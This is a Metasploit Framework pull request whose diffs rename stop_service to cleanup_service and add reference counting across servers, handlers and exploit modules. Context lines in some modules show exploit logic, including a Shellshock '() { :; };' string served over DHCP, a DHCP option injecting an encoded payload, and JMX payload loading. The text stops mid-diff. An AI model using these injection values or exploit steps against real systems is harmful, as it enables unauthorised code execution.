### PR TITLE
Service manager fixes

### DIFF
--- a/lib/msf/core/exploit/remote/dns/server.rb
+++ b/lib/msf/core/exploit/remote/dns/server.rb
@@ -130,22 +130,11 @@ module Server
   end
 
   #
-  # Stops the server
-  # @param destroy [TrueClass,FalseClass] Dereference the server object
-  def stop_service(destroy = false)
-    Rex::ServiceManager.stop_service(self.service) if self.service
-    if destroy
-      @dns_resolver = nil if @dns_resolver
-      self.service = nil if self.service
-    end
-  end
-
+  # Dereference the DNS service
   #
-  # Resets the DNS server
-  #
-  def reset_service
-    stop_service(true)
-    start_service
+  def cleanup
+    super
+    @dns_resolver = nil if @dns_resolver
   end
 
   #

--- a/lib/msf/core/exploit/remote/http_server/php_include.rb
+++ b/lib/msf/core/exploit/remote/http_server/php_include.rb
@@ -62,7 +62,7 @@ module Exploit::Remote::HttpServer::PHPInclude
     rescue ::Interrupt
       raise $!
     ensure
-      stop_service
+      cleanup_service
     end
   end
 

--- a/lib/msf/core/exploit/remote/http_server/php_include.rb
+++ b/lib/msf/core/exploit/remote/http_server/php_include.rb
@@ -55,15 +55,9 @@ module Exploit::Remote::HttpServer::PHPInclude
     #	print_error("reverse payload instead of bind.")
     #end
 
-    begin
-      print_status("PHP include server started.");
-      php_exploit
-      ::IO.select(nil, nil, nil, 5)
-    rescue ::Interrupt
-      raise $!
-    ensure
-      cleanup_service
-    end
+    print_status("PHP include server started.");
+    php_exploit
+    ::IO.select(nil, nil, nil, 5)
   end
 
   #

--- a/lib/msf/core/exploit/remote/ldap/server.rb
+++ b/lib/msf/core/exploit/remote/ldap/server.rb
@@ -96,14 +96,6 @@ module Msf
       rescue ::Errno::EACCES => e
         raise Rex::BindFailed, e.message
       end
-
-      #
-      # Resets the LDAP server
-      #
-      def reset_service
-        cleanup
-        start_service
-      end
     end
   end
 end

--- a/lib/msf/core/exploit/remote/socket_server.rb
+++ b/lib/msf/core/exploit/remote/socket_server.rb
@@ -59,7 +59,7 @@ module Exploit::Remote::SocketServer
   def cleanup
     super
     if service
-      stopped = stop_service
+      stopped = cleanup_service
       if stopped
         print_status("Server stopped.")
       end
@@ -79,9 +79,9 @@ module Exploit::Remote::SocketServer
   end
 
   #
-  # Stops the service.
+  # Cleans up the service; either closing the socket, or deferencing the service
   #
-  def stop_service
+  def cleanup_service
     if service
       begin
         if self.service.kind_of?(Rex::Service)

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -260,9 +260,7 @@ module ReverseHttp
   def stop_handler
     if self.service
       self.service.remove_resource((luri + "/").gsub("//", "/"))
-      if self.service.resources.empty? && self.sessions == 0
-        Rex::ServiceManager.stop_service(self.service)
-      end
+      Rex::ServiceManager.stop_service(self.service)
     end
   end
 

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -260,7 +260,7 @@ module ReverseHttp
   def stop_handler
     if self.service
       self.service.remove_resource((luri + "/").gsub("//", "/"))
-      Rex::ServiceManager.stop_service(self.service)
+      self.service.deref
     end
   end
 

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -261,6 +261,7 @@ module ReverseHttp
     if self.service
       self.service.remove_resource((luri + "/").gsub("//", "/"))
       self.service.deref
+      self.service = nil
     end
   end
 

--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -721,6 +721,9 @@ module HttpPacketDispatcher
       'Proc'             => Proc.new { |cli, req| on_passive_request(cli, req) },
       'VirtualDirectory' => true
     )
+
+    # Add a reference count to the handler
+    self.passive_service.ref
   end
 
   def shutdown_passive_dispatcher
@@ -729,9 +732,7 @@ module HttpPacketDispatcher
       resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
       self.passive_service.remove_resource(resource_uri) if self.passive_service
 
-      if self.passive_service.resources.empty?
-        Rex::ServiceManager.stop_service(self.passive_service)
-      end
+      Rex::ServiceManager.stop_service(self.passive_service)
       self.passive_service = nil
     end
     super

--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -732,7 +732,7 @@ module HttpPacketDispatcher
       resource_uri = "/" + self.conn_id.to_s.gsub(/(^\/|\/$)/, '') + "/"
       self.passive_service.remove_resource(resource_uri) if self.passive_service
 
-      Rex::ServiceManager.stop_service(self.passive_service)
+      self.passive_service.deref
       self.passive_service = nil
     end
     super

--- a/lib/rex/proto/dns/server.rb
+++ b/lib/rex/proto/dns/server.rb
@@ -318,7 +318,7 @@ class Server
   # Returns the hardcore alias for the DNS service
   #
   def self.hardcore_alias(*args)
-    "#{(args[0] || '')}-#{(args[1] || '')}-#{args[4] || ''}"
+    "#{(args[0] || '')}-#{(args[1] || '')}-#{args[5] || ''}"
   end
 
   #

--- a/lib/rex/proto/dns/server.rb
+++ b/lib/rex/proto/dns/server.rb
@@ -318,7 +318,7 @@ class Server
   # Returns the hardcore alias for the DNS service
   #
   def self.hardcore_alias(*args)
-    "#{(args[0] || '')}#{(args[1] || '')}"
+    "#{(args[0] || '')}-#{(args[1] || '')}-#{args[4] || ''}"
   end
 
   #

--- a/lib/rex/proto/http/server.rb
+++ b/lib/rex/proto/http/server.rb
@@ -127,7 +127,7 @@ class Server
   # Returns the hardcore alias for the HTTP service
   #
   def self.hardcore_alias(*args)
-    "#{(args[0] || '')}#{(args[1] || '')}"
+    "#{(args[0] || '')}-#{(args[1] || '')}-#{args[4] || ''}"
   end
 
   #

--- a/lib/rex/proto/ldap/server.rb
+++ b/lib/rex/proto/ldap/server.rb
@@ -251,7 +251,7 @@ module Rex
         # Returns the hardcore alias for the LDAP service
         #
         def self.hardcore_alias(*args)
-          "#{args[0] || ''}#{args[1] || ''}"
+          "#{args[0] || ''}-#{args[1] || ''}-#{args[4] || ''}"
         end
 
         #

--- a/lib/rex/proto/ssh/server.rb
+++ b/lib/rex/proto/ssh/server.rb
@@ -72,7 +72,7 @@ class Server
   # Returns the hardcore alias for the SSH service
   #
   def self.hardcore_alias(*args)
-    "#{(args[0])}#{(args[1])}"
+    "#{(args[0])}-#{(args[1])}-#{args[4] || ''}"
   end
 
   #

--- a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb
+++ b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def on_client_close(c)
-    stop_service
+    cleanup_service
   end
 end
 

--- a/modules/auxiliary/gather/safari_file_url_navigation.rb
+++ b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -322,7 +322,7 @@ class MetasploitModule < Msf::Auxiliary
     super
 
     # Kill FTP
-    stop_service
+    cleanup_service
 
     # clear my resource, deregister ref, stop/close the HTTP socket
     begin

--- a/modules/auxiliary/gather/safari_file_url_navigation.rb
+++ b/modules/auxiliary/gather/safari_file_url_navigation.rb
@@ -328,8 +328,6 @@ class MetasploitModule < Msf::Auxiliary
     begin
       @http_service.remove_resource(datastore['URIPATH'])
       @http_service.deref
-      @http_service.stop
-      @http_service.close
       @http_service = nil
     rescue
     end

--- a/modules/auxiliary/server/dns/native_server.rb
+++ b/modules/auxiliary/server/dns/native_server.rb
@@ -24,7 +24,16 @@ class MetasploitModule < Msf::Auxiliary
       },
       'Author'         => 'RageLtMan <rageltman[at]sempervictus>',
       'License'        => MSF_LICENSE,
-      'References'     => []
+      'References'     => [],
+      'Actions'     =>
+        [
+          [ 'Service', 'Description' => 'Serve DNS entries' ]
+        ],
+      'PassiveActions' =>
+        [
+          'Service'
+        ],
+      'DefaultAction'  => 'Service'
     ))
   end
 
@@ -37,8 +46,6 @@ class MetasploitModule < Msf::Auxiliary
       service.wait
     rescue Rex::BindFailed => e
       print_error "Failed to bind to port #{datastore['RPORT']}: #{e.message}"
-    ensure
-      stop_service(true)
     end
   end
 

--- a/modules/auxiliary/server/ldap.rb
+++ b/modules/auxiliary/server/ldap.rb
@@ -39,15 +39,13 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   #
-  # Wrapper for service execution and cleanup
+  # Wrapper for service execution
   #
   def run
     start_service
     service.wait
   rescue Rex::BindFailed => e
     print_error "Failed to bind to port #{datastore['SRVPORT']}: #{e.message}"
-  ensure
-    stop_service
   end
 
   #

--- a/modules/auxiliary/spoof/dns/native_spoofer.rb
+++ b/modules/auxiliary/spoof/dns/native_spoofer.rb
@@ -25,7 +25,17 @@ class MetasploitModule < Msf::Auxiliary
       },
       'Author'         => 'RageLtMan <rageltman[at]sempervictus>',
       'License'        => MSF_LICENSE,
-      'References'     => []
+      'References'     => [],
+      'Actions'     =>
+        [
+          [ 'Service', 'Description' => 'Serve DNS entries' ]
+        ],
+      'PassiveActions' =>
+        [
+          'Service'
+        ],
+      'DefaultAction'  => 'Service'
+
     ))
 
     register_options(
@@ -47,11 +57,13 @@ class MetasploitModule < Msf::Auxiliary
       service.wait
     rescue Rex::BindFailed => e
       print_error "Failed to bind to port #{datastore['RPORT']}: #{e.message}"
-    ensure
-      @capture_thread.kill if @capture_thread
-      close_pcap
-      stop_service(true)
     end
+  end
+
+  def cleanup
+    super
+    @capture_thread.kill if @capture_thread
+    close_pcap
   end
 
   #

--- a/modules/exploits/linux/http/vestacp_exec.rb
+++ b/modules/exploits/linux/http/vestacp_exec.rb
@@ -239,10 +239,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     start_http_server
-    payload_implant
-    login
-    start_backup_and_trigger_payload
-    stop_service
+    begin
+      payload_implant
+      login
+      start_backup_and_trigger_payload
+    ensure
+      cleanup_service
+    end
   end
 
   def on_request_uri(cli, _request)

--- a/modules/exploits/linux/http/vestacp_exec.rb
+++ b/modules/exploits/linux/http/vestacp_exec.rb
@@ -239,13 +239,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     start_http_server
-    begin
-      payload_implant
-      login
-      start_backup_and_trigger_payload
-    ensure
-      cleanup_service
-    end
+    payload_implant
+    login
+    start_backup_and_trigger_payload
   end
 
   def on_request_uri(cli, _request)

--- a/modules/exploits/multi/http/jboss_maindeployer.rb
+++ b/modules/exploits/multi/http/jboss_maindeployer.rb
@@ -216,7 +216,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_status("Shutting down the web service...")
-    stop_service
+    cleanup_service
 
 
     #

--- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
+++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
@@ -148,9 +148,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     #print_status("Giving time to the payload to execute...")
     #select(nil, nil, nil, 20) unless session_created?
-
-    print_status("Shutting down the web service...")
-    cleanup_service
   end
 
   # Handle incoming requests from the target

--- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
+++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #select(nil, nil, nil, 20) unless session_created?
 
     print_status("Shutting down the web service...")
-    stop_service
+    cleanup_service
   end
 
   # Handle incoming requests from the target

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -166,12 +166,12 @@ class MetasploitModule < Msf::Exploit::Remote
   #     sleep 1
   #     waited += 1
   #     if waited > datastore['HTTP_DELAY']
-  #       stop_service
+  #       cleanup_service
   #       return Exploit::CheckCode::Safe
   #     end
   #   end
   #
-  #   stop_service
+  #   cleanup_service
   #   return Exploit::CheckCode::Vulnerable
   # end
 

--- a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
+++ b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
@@ -149,7 +149,5 @@ class MetasploitModule < Msf::Exploit::Remote
 
     wait_until { @search_received && (!handler_enabled? || session_created?) }
     handler
-  ensure
-    cleanup_service
   end
 end

--- a/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
+++ b/modules/exploits/multi/http/ubiquiti_unifi_log4shell.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     wait_until { @search_received }
     @search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')
   ensure
-    stop_service
+    cleanup_service
   end
 
   def build_ldap_search_response_payload
@@ -150,6 +150,6 @@ class MetasploitModule < Msf::Exploit::Remote
     wait_until { @search_received && (!handler_enabled? || session_created?) }
     handler
   ensure
-    cleanup
+    cleanup_service
   end
 end

--- a/modules/exploits/multi/misc/java_jmx_server.rb
+++ b/modules/exploits/multi/misc/java_jmx_server.rb
@@ -131,63 +131,58 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Starting service...")
     start_service
 
-    begin
-      @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
-      connect
+    @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
+    connect
 
-      print_status("Sending RMI Header...")
-      unless is_rmi?
-        fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
-      end
-
-      print_status("Discovering the JMXRMI endpoint...")
-      mbean_server = discover_endpoint
-      disconnect
-      if mbean_server.nil?
-        fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
-      else
-        print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
-      end
-
-      # First try to connect to the original RHOST, since the mbean address may be inaccessible
-      begin
-        connect(true, { 'RPORT' => mbean_server[:port] })
-      rescue Rex::ConnectionError
-        # If that fails, try connecting to the listed address instead
-        connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
-      end
-
-      unless is_rmi?
-        fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
-      end
-
-      print_status("Proceeding with handshake...")
-      jmx_endpoint = handshake(mbean_server)
-      if jmx_endpoint.nil?
-        fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
-      else
-        print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
-      end
-
-      print_status("Loading payload...")
-      unless load_payload(jmx_endpoint)
-        fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
-      end
-
-      print_status("Executing payload...")
-      send_jmx_invoke(
-        object_number: jmx_endpoint[:object_number],
-        uid_number: jmx_endpoint[:uid].number,
-        uid_time: jmx_endpoint[:uid].time,
-        uid_count: jmx_endpoint[:uid].count,
-        object: "#{@mlet}:name=jmxpayload,id=1",
-        method: 'run'
-      )
-      disconnect
-    ensure
-      vprint_status("Stopping service...")
-      cleanup_service
+    print_status("Sending RMI Header...")
+    unless is_rmi?
+      fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
     end
+
+    print_status("Discovering the JMXRMI endpoint...")
+    mbean_server = discover_endpoint
+    disconnect
+    if mbean_server.nil?
+      fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
+    else
+      print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
+    end
+
+    # First try to connect to the original RHOST, since the mbean address may be inaccessible
+    begin
+      connect(true, { 'RPORT' => mbean_server[:port] })
+    rescue Rex::ConnectionError
+      # If that fails, try connecting to the listed address instead
+      connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
+    end
+
+    unless is_rmi?
+      fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
+    end
+
+    print_status("Proceeding with handshake...")
+    jmx_endpoint = handshake(mbean_server)
+    if jmx_endpoint.nil?
+      fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
+    else
+      print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
+    end
+
+    print_status("Loading payload...")
+    unless load_payload(jmx_endpoint)
+      fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
+    end
+
+    print_status("Executing payload...")
+    send_jmx_invoke(
+      object_number: jmx_endpoint[:object_number],
+      uid_number: jmx_endpoint[:uid].number,
+      uid_time: jmx_endpoint[:uid].time,
+      uid_count: jmx_endpoint[:uid].count,
+      object: "#{@mlet}:name=jmxpayload,id=1",
+      method: 'run'
+    )
+    disconnect
   end
 
   def is_rmi?

--- a/modules/exploits/multi/misc/java_jmx_server.rb
+++ b/modules/exploits/multi/misc/java_jmx_server.rb
@@ -131,60 +131,63 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Starting service...")
     start_service
 
-    @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
-    connect
-
-    print_status("Sending RMI Header...")
-    unless is_rmi?
-      fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
-    end
-
-    print_status("Discovering the JMXRMI endpoint...")
-    mbean_server = discover_endpoint
-    disconnect
-    if mbean_server.nil?
-      fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
-    else
-      print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
-    end
-
-    # First try to connect to the original RHOST, since the mbean address may be inaccessible
     begin
-      connect(true, { 'RPORT' => mbean_server[:port] })
-    rescue Rex::ConnectionError
-      # If that fails, try connecting to the listed address instead
-      connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
+      @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
+      connect
+  
+      print_status("Sending RMI Header...")
+      unless is_rmi?
+        fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
+      end
+  
+      print_status("Discovering the JMXRMI endpoint...")
+      mbean_server = discover_endpoint
+      disconnect
+      if mbean_server.nil?
+        fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
+      else
+        print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
+      end
+  
+      # First try to connect to the original RHOST, since the mbean address may be inaccessible
+      begin
+        connect(true, { 'RPORT' => mbean_server[:port] })
+      rescue Rex::ConnectionError
+        # If that fails, try connecting to the listed address instead
+        connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
+      end
+  
+      unless is_rmi?
+        fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
+      end
+  
+      print_status("Proceeding with handshake...")
+      jmx_endpoint = handshake(mbean_server)
+      if jmx_endpoint.nil?
+        fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
+      else
+        print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
+      end
+  
+      print_status("Loading payload...")
+      unless load_payload(jmx_endpoint)
+        fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
+      end
+  
+      print_status("Executing payload...")
+      send_jmx_invoke(
+        object_number: jmx_endpoint[:object_number],
+        uid_number: jmx_endpoint[:uid].number,
+        uid_time: jmx_endpoint[:uid].time,
+        uid_count: jmx_endpoint[:uid].count,
+        object: "#{@mlet}:name=jmxpayload,id=1",
+        method: 'run'
+      )
+      disconnect
+    ensure
+      vprint_status("Stopping service...")
+      cleanup_service
     end
-
-    unless is_rmi?
-      fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
-    end
-
-    print_status("Proceeding with handshake...")
-    jmx_endpoint = handshake(mbean_server)
-    if jmx_endpoint.nil?
-      fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
-    else
-      print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
-    end
-
-    print_status("Loading payload...")
-    unless load_payload(jmx_endpoint)
-      fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
-    end
-
-    print_status("Executing payload...")
-    send_jmx_invoke(
-      object_number: jmx_endpoint[:object_number],
-      uid_number: jmx_endpoint[:uid].number,
-      uid_time: jmx_endpoint[:uid].time,
-      uid_count: jmx_endpoint[:uid].count,
-      object: "#{@mlet}:name=jmxpayload,id=1",
-      method: 'run'
-    )
-    disconnect
-    vprint_status("Stopping service...")
-    stop_service
   end
 
   def is_rmi?

--- a/modules/exploits/multi/misc/java_jmx_server.rb
+++ b/modules/exploits/multi/misc/java_jmx_server.rb
@@ -134,12 +134,12 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
       connect
-  
+
       print_status("Sending RMI Header...")
       unless is_rmi?
         fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
       end
-  
+
       print_status("Discovering the JMXRMI endpoint...")
       mbean_server = discover_endpoint
       disconnect
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
       else
         print_good("JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
       end
-  
+
       # First try to connect to the original RHOST, since the mbean address may be inaccessible
       begin
         connect(true, { 'RPORT' => mbean_server[:port] })
@@ -156,11 +156,11 @@ class MetasploitModule < Msf::Exploit::Remote
         # If that fails, try connecting to the listed address instead
         connect(true, { 'RHOST' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
       end
-  
+
       unless is_rmi?
         fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
       end
-  
+
       print_status("Proceeding with handshake...")
       jmx_endpoint = handshake(mbean_server)
       if jmx_endpoint.nil?
@@ -168,12 +168,12 @@ class MetasploitModule < Msf::Exploit::Remote
       else
         print_good("Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
       end
-  
+
       print_status("Loading payload...")
       unless load_payload(jmx_endpoint)
         fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
       end
-  
+
       print_status("Executing payload...")
       send_jmx_invoke(
         object_number: jmx_endpoint[:object_number],

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -183,25 +183,8 @@ class MetasploitModule < Msf::Exploit::Remote
       })
 
       print_status("Replied to request for payload JAR")
-      stop_service
+      cleanup_service
     end
-  end
-
-  def cleanup
-    # Normally service termination should not be managed on the module's level, but this is a
-    # special case.
-    #
-    # Originally this special service termination routine was implemented in
-    # Exploit::Remote::TcpServer#stop_service, but that would actually cause all HttpServers to stop
-    # if one of them attempts to register a resource that is already taken, which seems to be a
-    # harsh punishment. This is why the fix is moved here.
-    #
-    # See references:
-    # https://github.com/rapid7/metasploit-framework/pull/4203
-    # https://github.com/rapid7/metasploit-framework/issues/6445
-    service.stop if service
-
-    super
   end
 
   def autofilter

--- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
+++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
@@ -195,7 +195,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Timed out waiting on the HTTP request")
       wdmserver.close
       disconnect()
-      stop_service()
+      cleanup_service()
       return
     end
 
@@ -210,7 +210,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("No executable sent :(")
     end
 
-    stop_service()
+    cleanup_service()
     wdmserver.close()
 
     handler

--- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
+++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
@@ -194,8 +194,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue ::Timeout::Error
       print_status("Timed out waiting on the HTTP request")
       wdmserver.close
-      disconnect()
-      cleanup_service()
+      disconnect
       return
     end
 
@@ -210,7 +209,6 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("No executable sent :(")
     end
 
-    cleanup_service()
     wdmserver.close()
 
     handler

--- a/modules/exploits/osx/browser/safari_file_policy.rb
+++ b/modules/exploits/osx/browser/safari_file_policy.rb
@@ -232,15 +232,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def cleanup
     super
 
-    # Kill FTP
-    stop_service()
-
     # clear my resource, deregister ref, stop/close the HTTP socket
     begin
       @http_service.remove_resource(datastore['URIPATH'])
       @http_service.deref
-      @http_service.stop
-      @http_service.close
       @http_service = nil
     rescue
     end

--- a/modules/exploits/unix/dhcp/bash_environment.rb
+++ b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -85,12 +85,8 @@ class MetasploitModule < Msf::Exploit::Remote
     hash['URL'] = "() { :; };#{echo}"
     start_service(hash)
 
-    begin
-      while @dhcp.thread.alive?
-        sleep 2
-      end
-    ensure
-      cleanup_service
+    while @dhcp.thread.alive?
+      sleep 2
     end
   end
 end

--- a/modules/exploits/unix/dhcp/bash_environment.rb
+++ b/modules/exploits/unix/dhcp/bash_environment.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
         sleep 2
       end
     ensure
-      stop_service
+      cleanup_service
     end
   end
 end

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -59,12 +59,13 @@ class MetasploitModule < Msf::Exploit::Remote
     start_service(hash)
     @dhcp.set_option(proxy_auto_discovery: "#{Rex::Text.rand_text_alpha(6..12)}'&#{payload.encoded} #")
 
-    begin
-      while @dhcp.thread.alive?
-        sleep 2
-      end
-    ensure
-      cleanup_service
+    while @dhcp.thread.alive?
+      sleep 2
     end
+  end
+
+  def cleanup
+    super
+    stop_service
   end
 end

--- a/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
+++ b/modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
         sleep 2
       end
     ensure
-      stop_service
+      cleanup_service
     end
   end
 end

--- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
+++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
@@ -114,29 +114,31 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
     start_service
 
-    print_status("Requesting a search using our custom XSLT...")
-    res = send_request_cgi({
-      'uri'      => '/search',
-      'vars_get' =>
-      {
-        'client'          => m[2],
-        'site'            => m[1],
-        'output'          => 'xml_no_dtd',
-        'q'               => rand_text_alpha(rand(15)+1),
-        'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
-        'proxyreload'     => '1'
-      }
-    }, 25)
+    begin
+      print_status("Requesting a search using our custom XSLT...")
+      res = send_request_cgi({
+        'uri'      => '/search',
+        'vars_get' =>
+        {
+          'client'          => m[2],
+          'site'            => m[1],
+          'output'          => 'xml_no_dtd',
+          'q'               => rand_text_alpha(rand(15)+1),
+          'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
+          'proxyreload'     => '1'
+        }
+      }, 25)
 
-    if (res)
-      print_status("The server returned: #{res.code} #{res.message}")
-      print_status("Waiting on the payload to execute...")
-      select(nil,nil,nil,20)
-    else
-      print_status("No response from the server")
+      if (res)
+        print_status("The server returned: #{res.code} #{res.message}")
+        print_status("Waiting on the payload to execute...")
+        select(nil,nil,nil,20)
+      else
+        print_status("No response from the server")
+      end
+    ensure
+      print_status("Shutting down the web service...")
+      cleanup_service
     end
-
-    print_status("Shutting down the web service...")
-    stop_service
   end
 end

--- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
+++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
@@ -114,31 +114,26 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
     start_service
 
-    begin
-      print_status("Requesting a search using our custom XSLT...")
-      res = send_request_cgi({
-        'uri'      => '/search',
-        'vars_get' =>
-        {
-          'client'          => m[2],
-          'site'            => m[1],
-          'output'          => 'xml_no_dtd',
-          'q'               => rand_text_alpha(rand(15)+1),
-          'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
-          'proxyreload'     => '1'
-        }
-      }, 25)
+    print_status("Requesting a search using our custom XSLT...")
+    res = send_request_cgi({
+      'uri'      => '/search',
+      'vars_get' =>
+      {
+        'client'          => m[2],
+        'site'            => m[1],
+        'output'          => 'xml_no_dtd',
+        'q'               => rand_text_alpha(rand(15)+1),
+        'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
+        'proxyreload'     => '1'
+      }
+    }, 25)
 
-      if (res)
-        print_status("The server returned: #{res.code} #{res.message}")
-        print_status("Waiting on the payload to execute...")
-        select(nil,nil,nil,20)
-      else
-        print_status("No response from the server")
-      end
-    ensure
-      print_status("Shutting down the web service...")
-      cleanup_service
+    if (res)
+      print_status("The server returned: #{res.code} #{res.message}")
+      print_status("Waiting on the payload to execute...")
+      select(nil,nil,nil,20)
+    else
+      print_status("No response from the server")
     end
   end
 end

--- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
+++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb
@@ -85,25 +85,28 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Starting up web service...")
     start_service
 
-    payload_uri = generate_payload_uri
-    vprint_status("Using URI #{payload_uri}")
+    begin
+      payload_uri = generate_payload_uri
+      vprint_status("Using URI #{payload_uri}")
 
-    random_file_name = rand_text_alphanumeric(rand(5) + 5)
-    post = {
